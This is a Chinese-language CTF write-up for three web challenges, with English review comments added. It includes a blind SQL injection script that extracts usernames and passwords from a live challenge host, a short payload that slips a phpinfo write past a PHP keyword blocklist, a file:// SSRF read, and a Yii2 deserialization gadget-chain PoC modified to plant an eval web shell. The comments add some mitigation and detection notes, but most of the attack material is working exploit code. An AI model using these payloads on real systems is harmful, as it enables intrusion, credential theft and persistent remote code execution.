find_it
首页没发现东西,尝试robots.txt
发现 1ndexx.php
但无法访问 1ndexx.php
尝试继续找信息泄露,最后找到 .1ndexx.php.swp
<?php
/*
 * Opens a MySQL connection as 'root' with no password through the legacy mysql_* extension
 * (ext/mysql was removed in PHP 7.0, so this page implies a PHP 5 runtime — assumption, confirm).
 * $link is used only to choose which <h2> the template renders below; nothing is queried here.
 * Review note (defence): an unauthenticated root database account is a misconfiguration on its
 * own, independent of the file-write logic that follows this template.
 */
$link = mysql_connect('localhost', 'root'); ?>
<html>
<head>
<title>Hello worldd!</title>
<style>
body {
background-color: white;
text-align: center;
padding: 50px;
font-family: "Open Sans","Helvetica Neue",Helvetica,Arial,sans-serif;
}
#logo {
margin-bottom: 40px;
}
</style>
</head>
<body>
<img id="logo" src="logo.png" />
<h1><?php echo "Hello My freind!"; ?></h1>
<?php /* Inverted-looking branch: the server version is rendered only when the connection FAILED. */ if($link) { ?>
<h2>I Can't view my php files?!</h2>
<?php } else { ?>
<h2>MySQL Server version: <?php echo mysql_get_server_info(); ?></h2>
<?php } ?>
</body>
</html>
<?php
#Really easy...
# Review summary of what this script does, in order:
#   1. read the whole of flag.php into a variable,
#   2. open hack.php for writing (truncating it),
#   3. reject $_GET['code'] if it matches a keyword blocklist or exceeds 33 bytes,
#   4. write the user bytes, then the flag.php contents, into hack.php.
# Defence notes: writing request-controlled bytes into a .php file inside the web root is an
# arbitrary-code-write regardless of how long the keyword list is; a blocklist can only name the
# tokens its author thought of and is not a security control here. The fix is to never write user
# input to an executable (or web-served) location, and never to copy a secret into such a file.
# Detection: a request carrying ?code= followed by a request for hack.php.
$file=fopen("flag.php","r") or die("Unable 2 open!");   # 'or' binds looser than '=', so $file gets the handle (or false, then die)
$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));   # entire flag.php contents
$hack=fopen("hack.php","w") or die("Unable 2 open");   # truncates hack.php on every request
$a=$_GET['code'];   # untrusted; emits an undefined-index notice/warning when the parameter is absent
if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){   # keyword blocklist ('replace' appears twice), applied to the raw bytes
    die("you die");
}
if(strlen($a)>33){   # byte length, checked after the blocklist
    die("nonono.");
}
fwrite($hack,$a);   # user bytes first ...
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);   # ... then the secret, into a web-served .php file
fclose($file);
fclose($hack);
?>
意思是让我们把内容写入 hack.php,flag.php 的内容也会一并写进去
尝试绕过,失败,忽然想起这是个变量,而phpinfo()
可以返回当前文件的所有变量
直接写<?=phpinfo()
,访问hack.php,搜索flag即可
WebsiteManger
最新的网站测试器,作为非站长的你,能利用好它的功能吗?
进来一个登录,网站测试器,应该是要进后台
发现疑似注入点
<img src="image.php?id=1" width="200" height="200">
加单引号直接报错,SQL注入进后台无疑
测试了下,布尔和延时都可以
然后过滤一些东西,如and,空格,反引号
直接布尔跑脚本
import requests
# Target from the writeup; the `id` query parameter is concatenated into SQL on the server
# (a single quote produced a database error), which is the root cause this script relies on.
url = "http://eci-2zeg1tmyhxfbufu01znt.cloudeci1.ichunqiu.com:80/image.php?id="
# Response-length threshold used as the boolean oracle: a body shorter than this is read as
# "condition true" in getResult() (presumably the image vs. an empty/error page — confirm).
mark = 30000
# The four assignments below overwrite one another; only the last `payload` is live by the time
# getResult() runs. Each trailing comment records what that stage recovered (db name, tables,
# columns, rows). `%09` (tab) stands in for spaces because the endpoint filters spaces, `and`
# and backticks (see the writeup) — stripping tokens is not a substitute for a parameterised
# query, which is the only fix that makes this kind of extraction impossible.
payload = "2=(ascii(substr(database(),{0},1))<{1})"#ctf
payload = "2=(ascii(substr((select%09group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema=database()),{0},1))<{1})"#images,users
payload = "2=(ascii(substr((select%09group_concat(column_name)%09from%09information_schema.columns%09where%09table_name='users'),{0},1))<{1})" #username,password
payload = "2=(ascii(substr((select%09group_concat(username,password)%09from%09users),{0},1))<{1})"
headers={
    # Tracking/session cookies copied from the author's browser; not needed for the injection itself.
    'Cookie':'UM_distinctid=178e9516af74c6-0c5738c00c76bf-3f356b-144000-178e9516af8445; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1618822948,1618823059,1619657823,1620521956; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1620542590; __jsluid_h=7c39815c08aa1e1162ff727572d92e27',
}
def getResult():
    """Recover one string from the blind-SQLi oracle, one character at a time.

    For each position 1..49 a binary search over ASCII 32..127 asks the server whether the
    character's code is below `mid`; the answer is read from the response length (see `mark`).
    The partial result is printed after every character. Uses the module globals `url`,
    `payload`, `mark` and `headers`, and issues live HTTP requests; the `return True` at the
    bottom is unreachable (see the note there), so the function effectively returns None.
    """
    flag=''
    global payload   # payload is only read, so this declaration is not needed (harmless)
    for i in range(1,50):   # at most 49 characters are recovered
        min=32   # shadows the builtins min()/max(); inclusive lower / exclusive upper search bound
        max=128
        while True:
            mid=min+(max-min)//2
            if min == mid :   # bounds have converged (max == min + 1): emit the character
                flag += chr(min)
                print(flag)
                break
            r=requests.get(url+payload.format(i,mid),headers=headers)
            print(url+payload.format(i,mid))
            if mark>len(r.text):   # short response => "ascii(...) < mid" held on the server
                max=mid
            else :
                min=mid
        # NOTE(review): when the while-loop exits, max == min + 1 always, so min + 3 == max can
        # never hold and this early return is dead code; the loop always runs all 49 positions.
        # The intent was presumably "stop at the first space (end of string)".
        if (min+3==max) and (min==32):
            return True
getResult()   # runs at import time: starts issuing requests immediately, no guard
拿用户名密码进后台
提示输入网站URL测试,想到伪协议
被坑了,最后在 host=file:///flag
读到flag,referer无用
framework
一道yii反序列化+disable_functions
打开明显的yii2框架
这里猜测有源码,因为反序列化入口未知
直接 /www.zip
发现源码,直接拷贝下来本地运行
在首页 web/index.php
加一行 echo(Yii::getVersion());
查看到版本为2.0.32
找到反序列化入口点
/**
 * Controller action reached via ?r=site/about (per the writeup).
 *
 * Deserialisation entry point: $message comes straight from the request, is base64-decoded
 * and handed to unserialize() with no class allow-list, so any gadget chain reachable through
 * the autoloaded classes runs during unserialize() or on object destruction. The result is
 * discarded; only the side effects matter.
 *
 * Mitigation: do not unserialize request data at all (json_decode for structured input); if
 * unserialize() is unavoidable, pass ['allowed_classes' => false] or an explicit list.
 * Detection: base64 values of `message` that decode to serialized PHP (leading "O:" / "a:").
 *
 * @param string $message base64-encoded payload; the default 'Hello' is not valid serialized data
 */
public function actionAbout($message = 'Hello')
{
    $data = base64_decode($message);
    unserialize($data);   // return value discarded
}
直接打流传最广的poc链
<?php
namespace yii\rest{
    // Minimal stand-in for the framework's yii\rest\CreateAction: only the two properties the
    // chain needs are declared, so the serialized object carries just these values. Which
    // framework method consumes checkAccess/id is not visible in this file — NOTE(review):
    // confirm against the 2.0.32 source named in the writeup.
    class CreateAction{
        public $checkAccess;   // a plain function name, i.e. a string callable
        public $id;            // presumably passed as that callable's argument — verify
        public function __construct(){
            $this->checkAccess = 'phpinfo';
            $this->id = '5';
        }
    }
}
namespace Faker{
    use yii\rest\CreateAction;
    // Stand-in for Faker\Generator. The shape of the chain suggests the real class routes a
    // method call named 'close' through $formatters to [CreateAction, 'run'] — NOTE(review):
    // inferred from this file's structure, not from code shown here; confirm in the library.
    class Generator{
        protected $formatters;
        public function __construct(){
            $this->formatters['close'] = [new CreateAction, 'run'];   // array-form callable, serialized with the object
        }
    }
}
namespace yii\db{
    use Faker\Generator;
    // Root of the chain: the outermost object unserialize() rebuilds. The private property is
    // serialized name-mangled ("\0yii\db\BatchQueryResult\0_dataReader"), which is also a useful
    // detection string. What the real class does with _dataReader on destruction is not shown
    // here — confirm in the framework source.
    class BatchQueryResult{
        private $_dataReader;
        public function __construct(){
            $this->_dataReader = new Generator;
        }
    }
}
namespace{
    // Emits the payload in the form actionAbout() expects: serialize() then base64.
    // Defence: before encoding the string starts with "O:"; alerting on base64 request values
    // that decode to serialized PHP objects is a cheap detection on this parameter.
    echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>
?r=site%2Fabout&message=
发现有disable_functions限制
pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,dl,mail,putenv,error_log,error_reporting,unset,unlink,return
一番尝试后发现assert没被禁用,可以进行代码执行
改poc
// Changed sink for the chain: assert() is absent from the disable_functions list above, and on
// PHP 7 it evaluates a string argument as code (that behaviour was removed in PHP 8.0).
// Defence: zend.assertions = -1 in production and list assert in disable_functions alongside
// the exec-family functions; detection: the web-server user creating new .php files under the
// document root.
$this->checkAccess = 'assert';
$this->id = 'file_put_contents("shell.php","<?php eval(\$_POST[1]);?>");die();';
蚁剑连上去,直接用disable_functions的Apache CGI插件秒杀
flag在 /readflag 中